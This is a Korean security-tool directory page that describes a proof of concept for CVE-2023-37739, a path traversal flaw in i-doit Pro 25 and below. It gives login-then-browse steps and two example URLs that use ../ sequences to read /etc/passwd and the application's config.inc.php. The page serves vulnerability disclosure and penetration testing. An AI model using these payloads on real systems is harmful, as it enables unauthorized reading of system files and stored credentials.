Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below — CVE-2023-37739에 대한 개념 증명 익스플로잇으로, i-doit Pro 25 이하에서 패스 트래버설(path traversal) 취약점입니다. 인증된 사용자가 조작된 moduleID 및 file 매개변수를 통해 민감한 파일을 읽을 수 있습니다. | Kitploit
도구/GitHubGitHub/leekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubleekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below

CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below

CVE-2023-37739에 대한 개념 증명 익스플로잇으로, i-doit Pro 25 이하에서 패스 트래버설(path traversal) 취약점입니다. 인증된 사용자가 조작된 moduleID 및 file 매개변수를 통해 민감한 파일을 읽을 수 있습니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
2년 전아직 검토되지 않음

CVE-2023-37739 - i-doit Pro 25 및 이하 버전의 경로 순회 취약점

i-doit Pro 25 및 이하 버전은 경로 순회(Path Traversal) 취약점에 취약합니다. 이 취약점을 통해 원격 인증된 공격자(낮은 권한 또는 높은 권한)는 사용자가 접근할 수 없는 위치로 이동할 수 있으며, 이를 사용하여 민감한 파일을 읽거나 접근할 수 있습니다.

제품 설명: i-doit은 synetics GmbH에서 개발한 웹 기반 IT 문서화 및 CMDB(구성 관리 데이터베이스)입니다. i-doit Pro는 소프트웨어의 상용 버전이며 유료 라이선스가 필요합니다. 추가 기능, 전문 지원, 정기적인 업데이트 및 개선 사항이 제공됩니다. 사용자는 i-doit Pro를 사용하기 위해 라이선스를 구매해야 하며, 비용은 사용자 수와 필요한 기능에 따라 다릅니다.

취약점 설명: 이 웹 애플리케이션은 인증된 모든 사용자가 접근해서는 안 되는 위치로 이동할 수 있도록 허용한다는 것을 발견했습니다. 이를 사용하여 민감한 파일을 읽거나 접근할 수 있습니다...

영향을 받는 웹페이지: /?moduleID 및 /index.php

영향을 받는 매개변수 및 구성 요소 1: ?moduleID=2&file_manager=image&file

영향을 받는 매개변수 및 구성 요소 2: ?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=

Step 1: 유효한 사용자(낮은 권한 또는 높은 권한)로 로그인합니다. 아래 URL로 이동하여 읽거나 접근하려는 파일에 맞게 ../../../를 수정하세요.

step1

예 1: http://IP/?moduleID=2&file_manager=image&file=../../../../../../..//etc/passwd

예 2: http://IP/index.php?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=../../../src/config.inc.php

step2

step3

step4

도구 다운로드